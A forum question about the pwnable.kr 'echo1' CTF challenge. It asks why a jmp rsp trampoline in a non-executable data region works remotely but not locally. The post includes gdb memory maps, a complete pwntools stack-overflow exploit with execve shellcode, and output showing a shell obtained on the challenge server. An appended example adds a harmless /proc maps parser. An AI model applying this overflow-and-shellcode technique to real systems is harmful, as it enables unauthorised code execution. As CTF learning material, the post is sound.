http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2011
Previous post: http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000
I previously posted a question because I couldn't understand the echo1 write-up even after reading it, but since it didn't get resolved I said I'd come back to it later and moved on.
Now I'm looking at the echo1 problem again, and I still don't understand it.
Clearly an overflow occurs in echo1, and NX is not applied, so it looks like a problem where you run shellcode. The key question is how to get it executed, and looking at the write-up, it stores the opcode for jmp rsp (\xff\xe4) in the id area and then executes that. (rsp is pointing at the shellcode.)
The problem is that the id area has no execute permission, so even if the opcode is stored there it can't be executed.
So even if rip is redirected to id, a SIGSEGV occurs when it tries to execute. Locally, that is.
But when I do it remotely, it works fine? It's a bit confusing; what am I missing..
[Debugging info]
(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'
(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621 /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621 /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621 /home/ubuntu/ctf/echo1 // no execute permission here
(omitted)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack] // execute permission here
(omitted)
(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>
[Exploit code]
from pwn import *
#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")
name = jmp_rsp
name_addr = 0x6020a0
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1") # 1. BOF
payload = b"a"*0x20 + b"b"*0x8 # buf + rbp
payload += p64(name_addr) # ret
payload += sc
p.sendline(payload)
p.interactive()
[Execution result]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$ id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1)
Hit : 1547 Date : 2022/10/05 12:21
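Added example (not the poster's code): a small Python parser for the /proc/<pid>/maps format quoted in the debugging info above. It automates the two checks the post does by hand, which mapping a given address such as &id = 0x6020a0 falls in and which mappings are both writable and executable, so the same audit can be run against any process.

```python
import re
from dataclasses import dataclass

# Constructed sample: the /proc/<pid>/maps lines quoted in the post,
# with the hand-written trailing comments removed.
SAMPLE_MAPS = """\
00400000-00401000 r-xp 00000000 ca:01 785621 /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621 /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621 /home/ubuntu/ctf/echo1
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
"""

MAPS_RE = re.compile(  # one maps line: start-end perms offset dev inode [path]
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>\S+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    path: str

    def contains(self, addr: int) -> bool:
        return self.start <= addr < self.end

    @property
    def writable_and_executable(self) -> bool:
        # A region that is both writable and executable breaks W^X;
        # the post's [stack] line is exactly such a region.
        return "w" in self.perms and "x" in self.perms

def parse_maps(text: str) -> list:
    """Parse maps text into Mapping objects, skipping malformed lines."""
    result = []
    for line in text.splitlines():
        m = MAPS_RE.match(line.strip())
        if m:
            result.append(Mapping(int(m["start"], 16), int(m["end"], 16),
                                  m["perms"], m["path"].strip()))
    return result

def find_mapping(mappings: list, addr: int):
    """Return the mapping that contains addr (e.g. &id = 0x6020a0), or None."""
    return next((mp for mp in mappings if mp.contains(addr)), None)

def wx_violations(mappings: list) -> list:
    """Mappings that are both writable and executable."""
    return [mp for mp in mappings if mp.writable_and_executable]
```

Running the parser over the maps of the same binary on two hosts shows directly whether a region is mapped with different permissions, which is the first thing to compare when a crash reproduces on one machine but not the other.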